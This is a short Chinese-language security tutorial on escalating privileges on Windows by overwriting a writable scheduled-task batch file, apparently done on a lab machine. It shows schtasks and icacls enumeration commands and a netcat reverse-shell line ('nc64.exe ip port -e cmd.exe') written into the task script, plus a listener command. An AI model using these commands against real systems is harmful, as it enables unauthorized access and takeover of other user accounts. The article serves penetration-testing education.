windows提权！

阅读须知：

探索者安全团队技术文章仅供参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用本公众号所提供的技术和信息而造成的任何直接或者间接的后果及损失，均由使用者
本人负责，作者不为此承担任何责任,如有侵权烦请告知，我们会立即删除并致歉,创作不易转载请标明出处.感谢!

0T01介绍

今天由K1t0带领大家学一种windows提权的方法
个人理解windows计划任务有很多,如果我们能够更改计划任务的.bat 文件 将他修改成我们需要的内容例如一个nc 的 连接 就可以获取相应执行者权限，可以用来横向和纵向提权

0T02查看计划任务

schtasks 是windwos 的查看计划任务的工具

schtasks /query  /tn  计划任务名字 /fo list /v

/fo list /v  是详细列出计划任务并且详细表示!

例如我们查看到 名字为vulntask文件名字的计划任务如下的计划任务

从中可以知道运行的脚本 以及 作者 和 运行的用户 是谁
可以看到是taskusr1 那么我们就或许可以横向到 这个用户

0T03权限

首先看脚本文件的权限
icacls 文件
icacls C:\tasks\schtask.bat

可以看到我们有 F 读写执行完全的权限,只要有这个权限我们完全可以写入 反向连接shell
BUILTIN\Users:(I)(F)：这表示内置用户组 “Users” 对该文件拥有读取和完全控制的权限。
NT AUTHORITY\SYSTEM:(I)(F)：这表示系统用户拥有对该文件的读取和完全控制权限。
BUILTIN\Administrators:(I)(F)：这表示内置管理员组拥有对该文件的读取和完全控制权限。
在这里，括号中的 (I) 代表 “继承”，(F) 代表 “完全控制”。

0T04 提权

在这个靶机上我们可以看到 已经存在nc

直接写入echo c:/tools/nc64.exe ip 端口 -e cmd.exe > C:\tasks\schtask.bat
然后开启监听 nc -nvlp 端口就可以横向提权到 taskusr1

非常感谢K1t0大师傅的精彩投稿,喜欢的小伙伴可以点点赞哦!

---

同时感兴趣的小伙伴可以多多关注我们团队哦!!!